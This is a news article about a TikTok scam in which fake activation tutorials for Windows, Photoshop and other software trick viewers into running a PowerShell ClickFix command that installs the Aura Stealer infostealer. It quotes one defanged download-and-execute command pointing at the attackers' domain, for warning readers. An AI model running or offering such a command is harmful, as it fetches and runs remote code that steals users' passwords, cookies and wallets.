Cybercriminals are now using TikTok to trick users into downloading malware by pretending to share free activation guides for popular software like Windows, Spotify, and Netflix.
These fake tutorials are part of a campaign discovered by ISC Handler Xavier Mertens, similar to one earlier reported by Trend Micro.
According to BleepingComputer, the videos appear to show step-by-step instructions on how to activate well-known software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. Some even reference fake services like “Netflix Premium” or “Spotify Premium.”
The scam relies on a social engineering technique called a ClickFix attack. In this method, the video shows what looks like a simple fix and asks viewers to run a short PowerShell command as an administrator. For example, the command might look like:
iex (irm slmgr[.]win/photoshop)
The word “photoshop” in the URL changes depending on which software the video claims to activate. When the user runs the command, PowerShell connects to a remote site called slmgr[.]win and downloads another script.
That script then retrieves two executables hosted on Cloudflare Pages. The first file, updater.exe, is a variant of the Aura Stealer malware. This malicious program steals saved browser passwords, authentication cookies, cryptocurrency wallets, and login details from other apps, then sends them to the attackers.
A second file, source.exe, is also downloaded. It compiles and runs additional code in memory using Microsoft’s Visual C# Compiler, though its exact purpose is still unknown.
Anyone who has followed these fake guides should assume their credentials are compromised and immediately reset all passwords for online accounts.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
ClickFix-style attacks have become increasingly common in the past year, often used to spread ransomware and cryptocurrency-stealing malware. To stay safe, users should never copy and run commands they see online in PowerShell, Command Prompt, File Explorer, or any system terminal, no matter how legitimate they look.
